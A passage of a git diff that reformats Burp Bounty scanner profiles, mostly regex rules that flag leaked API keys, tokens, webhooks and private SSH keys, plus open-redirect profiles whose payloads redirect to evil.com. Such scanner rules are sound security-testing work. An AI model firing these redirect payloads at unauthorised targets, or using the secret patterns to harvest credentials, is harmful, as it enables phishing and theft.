0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "NoSQL Session Token", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/NuGet_Api_Key.bb b/profiles/NuGet_Api_Key.bb old mode 100644 new mode 100755 index 615f7f9..0b88f26 --- a/profiles/NuGet_Api_Key.bb +++ b/profiles/NuGet_Api_Key.bb @@ -1 +1,59 @@ -[{"Name":"NuGet_Api_Key","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,X-NuGet-ApiKey"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"NuGet Api Key","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "NuGet_Api_Key", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,X-NuGet-ApiKey" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": true, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "NuGet Api Key", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/OAuth2.bb b/profiles/OAuth2.bb old mode 100644 new mode 100755 index 77c42be..57618a1 --- a/profiles/OAuth2.bb +++ b/profiles/OAuth2.bb @@ -1 +1,65 @@ -[{"Name":"OAuth2","Enabled":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["response_type","client_id","grant_type","redirect_uri","oauth","oidc"],"Tags":["JWT"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"OAuth2","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"OAuth2 Found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "OAuth2", + "Name": "", + "Enabled": true, + "Scanner": 3, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,All Request,Value,response_type", + "true,Or,All Request,Value,client_id", + "true,Or,All Request,Value,grant_type", + "true,Or,All Request,Value,redirect_uri", + "true,Or,All Request,Value,oauth", + "true,Or,All Request,Value,oidc" + ], + "Tags": [ + "JWT", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "OAuth2", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "OAuth2 Found", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/OAuth2response.bb b/profiles/OAuth2response.bb new file mode 100755 index 0000000..85b5c4c --- /dev/null +++ b/profiles/OAuth2response.bb @@ -0,0 +1,64 @@ +[ + { + "ProfileName": "OAuth2response", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,response_type", + "true,Or,client_id", + "true,Or,grant_type", + "true,Or,redirect_uri", + "true,Or,oauth", + "true,Or,oidc" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "OAuth2", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "OAuth2 Found", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Octopus_API_Key.bb b/profiles/Octopus_API_Key.bb old mode 100644 new mode 100755 index 6b0aca2..ee618c5 --- a/profiles/Octopus_API_Key.bb +++ b/profiles/Octopus_API_Key.bb @@ -1 +1,59 @@ -[{"Name":"Octopus_API_Key","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,X-Octopus-ApiKey"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"X-Octopus-ApiKey","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Octopus_API_Key", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,X-Octopus-ApiKey" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": true, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "X-Octopus-ApiKey", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/OpenRedirect-ParameterPollution.bb b/profiles/OpenRedirect-ParameterPollution.bb index 872f8e6..1696d22 100755 --- a/profiles/OpenRedirect-ParameterPollution.bb +++ b/profiles/OpenRedirect-ParameterPollution.bb @@ -1 +1,129 @@ -[{"Name":"OpenRedirect-ParameterPollution","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["/{payload}","?next\u003d{payload}","?url\u003d{payload}","?target\u003d{payload}","?rurl\u003d{payload}","?dest\u003d{payload}","?destination\u003d{payload}","?redir\u003d{payload}","?redirect_uri\u003d{payload}","?redirect\u003d{payload}","/redirect/{payload}","/cgi-bin/redirect.cgi?{payload}","/out/{payload}","/out?{payload}","?view\u003d{payload}","/login?to\u003d{payload}","?image_url\u003d{payload}","?go\u003d{payload}","?return\u003d{payload}","?returnTo\u003d{payload}","?return_to\u003d{payload}","?checkout_url\u003d{payload}","?continue\u003d{payload}","?return_path\u003d{payload}"],"Encoder":[" "],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,-Token1337-"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":9,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"OpenRedirect-ParameterPollution","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Open Redirect with payload: \u003cbr\u003e\u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{payload}","replace":"http://www.wagiro.com/test-open-redirect","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "OpenRedirect-ParameterPollution", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,/{payload}", + "true,?next\u003d{payload}", + "true,?url\u003d{payload}", + "true,?target\u003d{payload}", + "true,?rurl\u003d{payload}", + "true,?dest\u003d{payload}", + "true,?destination\u003d{payload}", + "true,?redir\u003d{payload}", + "true,?redirect_uri\u003d{payload}", + "true,?redirect\u003d{payload}", + "true,/redirect/{payload}", + "true,/cgi-bin/redirect.cgi?{payload}", + "true,/out/{payload}", + "true,/out?{payload}", + "true,?view\u003d{payload}", + "true,/login?to\u003d{payload}", + "true,?image_url\u003d{payload}", + "true,?go\u003d{payload}", + "true,?return\u003d{payload}", + "true,?returnTo\u003d{payload}", + "true,?return_to\u003d{payload}", + "true,?checkout_url\u003d{payload}", + "true,?continue\u003d{payload}", + "true,?return_path\u003d{payload}" + ], + "Encoder": [ + " " + ], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,-Token1337-" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 4, + "MaxRedir": 9, + "payloadPosition": 2, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "OpenRedirect-ParameterPollution", + "IssueSeverity": "Medium", + "IssueConfidence": "Certain", + "IssueDetail": "Open Redirect with payload: \u003cbr\u003e\u003cpayload\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [ + { + "type": "Payload", + "match": "{payload}", + "replace": "http://www.wagiro.com/test-open-redirect", + "regex": "String" + } + ], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/OpenRedirect.bb b/profiles/OpenRedirect.bb index 220242d..ba8e5d3 100755 --- a/profiles/OpenRedirect.bb +++ b/profiles/OpenRedirect.bb @@ -1 +1,113 @@ -[{"Name":"OpenRedirect","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["%2F%09%2Fevil.com","%2F%10%2Fevil.com","%2F%13%2Fevil.com","evil.com","/evil.com","//evil.com","///evil.com","////evil.com","/\\evil.com","%2fevil.com","%2f$2fevil.com","%2fevil.com%2f%2f","$2f%2fevil.com%2f%2f","%2fevil.com//","http://example.com%0a%23.evil.com"],"Encoder":[" "],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,location.*evil.com"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":4,"MaxRedir":9,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"OpenRedirect","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Open Redirect with payload: \u003cbr\u003e\u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "OpenRedirect", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,%2F%09%2Fevil.com", + "true,%2F%10%2Fevil.com", + "true,%2F%13%2Fevil.com", + "true,evil.com", + "true,/evil.com", + "true,//evil.com", + "true,///evil.com", + "true,////evil.com", + "true,/\\evil.com", + "true,%2fevil.com", + "true,%2f$2fevil.com", + "true,%2fevil.com%2f%2f", + "true,$2f%2fevil.com%2f%2f", + "true,%2fevil.com//", + "true,http://example.com%0a%23.evil.com" + ], + "Encoder": [ + " " + ], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,location.*evil.com" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": true, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 0, + "RedirType": 4, + "MaxRedir": 9, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "OpenRedirect", + "IssueSeverity": "Medium", + "IssueConfidence": "Certain", + "IssueDetail": "Open Redirect with payload: \u003cbr\u003e\u003cpayload\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/OpenRedirectActive.bb b/profiles/OpenRedirectActive.bb index 5af1096..196c5b0 100755 --- a/profiles/OpenRedirectActive.bb +++ b/profiles/OpenRedirectActive.bb @@ -1 +1,72 @@ -[{"Name":"OpenRedirectActive","Enabled":true,"Scanner":1,"Author":"@GochaOqradze","Payloads":["redirectx"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,\u003cmeta http-equiv\u003d\"refresh\".*redirectx\" /\u003e","true,Or,window\\.location.*redirectx","true,Or,Location:.*redirectx"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"","IssueSeverity":"","IssueConfidence":"","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[65,36,1,6,5,64,0,3],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "OpenRedirectActive", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@GochaOqradze", + "Payloads": [ + "true,redirectx" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,\u003cmeta http-equiv\u003d\"refresh\".*redirectx\" /\u003e", + "true,Or,window\\.location.*redirectx", + "true,Or,Location:.*redirectx" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "", + "IssueSeverity": "", + "IssueConfidence": "", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 65, + 36, + 1, + 6, + 5, + 64, + 0, + 3 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Outlook_Team.bb b/profiles/Outlook_Team.bb old mode 100644 new mode 100755 index 226e6ba..e8bd26b --- a/profiles/Outlook_Team.bb +++ b/profiles/Outlook_Team.bb @@ -1 +1,59 @@ -[{"Name":"Outlook_Team","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(https\\\\:\\/\\/outlook\\\\.office.com\\/webhook\\/[0-9a-f-]{36}\\\\@)"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Outlook Team","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Outlook_Team", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(https\\\\:\\/\\/outlook\\\\.office.com\\/webhook\\/[0-9a-f-]{36}\\\\@)" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Outlook Team", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Paypal_Braintree_access_token.bb b/profiles/Paypal_Braintree_access_token.bb old mode 100644 new mode 100755 index 810af32..052b665 --- a/profiles/Paypal_Braintree_access_token.bb +++ b/profiles/Paypal_Braintree_access_token.bb @@ -1 +1,59 @@ -[{"Name":"Paypal_Braintree_access_token","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":0,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Paypal Braintree access token","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Paypal_Braintree_access_token", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Paypal Braintree access token", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Picatic_API_Key.bb b/profiles/Picatic_API_Key.bb old mode 100644 new mode 100755 index b46fa02..5b1c8b0 --- a/profiles/Picatic_API_Key.bb +++ b/profiles/Picatic_API_Key.bb @@ -1 +1,59 @@ -[{"Name":"Picatic_API_Key","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,sk_live_[0-9a-z]{32}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Picatic API Key","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Picatic_API_Key", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,sk_live_[0-9a-z]{32}" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Picatic API Key", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Private_SSH_Key.bb b/profiles/Private_SSH_Key.bb old mode 100644 new mode 100755 index 64ca1fa..6deb07a --- a/profiles/Private_SSH_Key.bb +++ b/profiles/Private_SSH_Key.bb @@ -1 +1,59 @@ -[{"Name":"Private_SSH_Key","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,([-]+BEGIN [^\\s]+ PRIVATE KEY[-])"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Private SSH 